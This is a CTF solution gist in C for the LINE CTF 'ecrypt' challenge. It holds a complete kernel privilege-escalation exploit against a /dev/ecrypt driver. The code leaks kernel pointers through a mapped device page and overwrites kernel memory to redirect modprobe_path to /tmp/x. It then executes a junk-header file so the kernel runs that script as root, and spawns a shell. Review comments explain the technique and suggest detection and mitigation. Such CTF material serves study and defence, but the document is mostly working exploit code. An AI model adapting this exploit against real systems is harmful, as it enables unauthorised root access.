@r4j0x00
Created March 27, 2022 00:08
linectf ecrypt
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
/*
 * ioctl request codes this program passes to /dev/ecrypt. The driver itself
 * is not part of this file, so what each request does is known only from its
 * name. RESETKEY and RESETIV are declared but never used below.
 */
enum {
    SETKEY   = 0x3003003,
    SETIV    = 0x4004004,
    RESETKEY = 0x5005005,
    RESETIV  = 0x6006006
};

/* Zero-filled 4 KiB scratch buffer; main() hands it to the first SETKEY and SETIV calls. */
char buf[0x1000] = {0};
/*
 * Final stage of the program: runs a fixed sequence of shell commands and
 * file writes, then starts an interactive shell.
 *
 * Steps visible here:
 *   1. Create /tmp/x, a shell script whose only command is `chmod 777 /flag`.
 *   2. Create /tmp/asd holding the four bytes ff ff ff ff, then execute it.
 *   3. Spawn `sh`.
 *
 * NOTE(review): this matches the well-known kernel.modprobe pattern, in which
 * executing a file with an unrecognised header makes the kernel launch its
 * module-loader helper as root; main() appears to have tried to repoint that
 * helper at /tmp/x before calling here. Nothing in this function verifies
 * that the repointing succeeded, and no return value is checked.
 *
 * Defensive relevance: a kernel built with CONFIG_STATIC_USERMODEHELPER does
 * not take the helper path from a writable variable, and a change in the
 * value of /proc/sys/kernel/modprobe or a root-owned helper process executing
 * from /tmp are both useful detection signals.
 */
void modprobe_hax()
{
/* Script that a root-run helper would execute: makes /flag world-accessible. */
system("echo '#!/bin/sh' > /tmp/x; echo 'chmod 777 /flag' >> /tmp/x");
system("chmod +x /tmp/x");
/*
 * O_CREAT is used without the mode argument that open() requires with it, so
 * the new file's permission bits are indeterminate; the chmod in the next
 * system() call sets them explicitly.
 */
int ff = open("/tmp/asd", O_WRONLY|O_CREAT);
/* Four 0xff bytes: not a header any executable format recognises. */
write(ff, "\xff\xff\xff\xff", 4);
close(ff);
/* Executing the file fails as a program; the attempt itself is the point. */
system("chmod 777 /tmp/asd; /tmp/asd");
system("sh");
}
/*
 * CTF solution driver for the /dev/ecrypt character device.
 *
 * What the code visibly does, in order:
 *   - opens the device and issues SETKEY and SETIV with a zeroed buffer;
 *   - maps one page of the device (file offset 0x1000) read/write and dumps
 *     its non-zero 64-bit words;
 *   - derives two addresses from ptr[1] using hard-coded constants, writes
 *     one of them into ptr[0] and issues SETKEY again with a small array;
 *   - reads 8 bytes from /proc/sys/kernel/modprobe, stores them in ptr[0],
 *     issues SETKEY with the string "/tmp/x", and calls modprobe_hax().
 *
 * NOTE(review): the driver source is not shown. The code only makes sense if
 * the mapped page exposes driver-internal state, including kernel pointers,
 * that userspace can both read and overwrite — presumably the root cause.
 * The numeric offsets would then be specific to one kernel build. The
 * general remedy on the driver side is for its mmap handler to validate
 * offset and length and to map only buffers intended for user access, never
 * pages that hold kernel pointers or object metadata.
 *
 * No call in this function has its result checked beyond being printed.
 */
int main(void) {
int result;
int fd = open("/dev/ecrypt", O_RDWR);
printf("[*] fd: %d\n", fd);
/* Both requests receive the zero-filled global buffer. */
result = ioctl(fd, SETKEY, buf);
printf("[*] SETKEY: %d\n", result);
result = ioctl(fd, SETIV, buf);
printf("[*] SETIV: %d\n", result);
/*
 * The first argument is an integer literal where mmap() expects void *, and
 * MAP_FIXED is not set, so the address is only a placement hint. On failure
 * mmap() returns MAP_FAILED, which is not tested before ptr is dereferenced.
 */
uint64_t* ptr = mmap(0xcafebabe000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x1000);
printf("[*] mmap!! -> %p\n", ptr);
/* 512 words of 8 bytes cover the whole 0x1000-byte mapping. */
for (int i = 0; i < 512; i++) {
if (ptr[i] != 0) {
printf("[*] ptr[%d]: %lx\n", i, ptr[i]);
}
}
/* 9-byte array ("modprobe" plus NUL); reused further down for "/tmp/x". */
char asd[] = "modprobe";
result = ioctl(fd, SETKEY, asd);
printf("[*] SETKEY: %d\n", result);
/*
 * Clears the low 28 bits of ptr[1] and adds fixed constants. Presumably
 * ptr[1] is a kernel address and the constants are symbol offsets for the
 * challenge kernel — TODO confirm against the driver and kernel image.
 */
uint64_t modprobe = (ptr[1] & ~0xfffffff) + 0x3502540-0x10;
/* Algebraically this is (ptr[1] & ~0xfffffff) + 0x264e608. */
uint64_t _modprobe = modprobe - 0x3502540 + 0x264e608 + 0x10;
/* Third element captures the current ptr[0] before it is overwritten below. */
uint64_t modprobe_ctl[] = {0, 0, ptr[0], _modprobe};
ptr[0] = modprobe;
result = ioctl(fd, SETKEY, (void *)modprobe_ctl);
/* Flags value 0 is O_RDONLY. */
int mp = open("/proc/sys/kernel/modprobe", 0);
uint64_t modprobe_path;
/* Reads the first 8 raw bytes of the sysctl text into an integer. */
read(mp, &modprobe_path, 8);
ptr[0] = modprobe_path;
printf("modprobe: %#lx\n", modprobe_path);
/* "/tmp/x" plus NUL is 7 bytes, which fits in the 9-byte array. */
strcpy(asd, "/tmp/x");
ioctl(fd, SETKEY, asd);
modprobe_hax();
}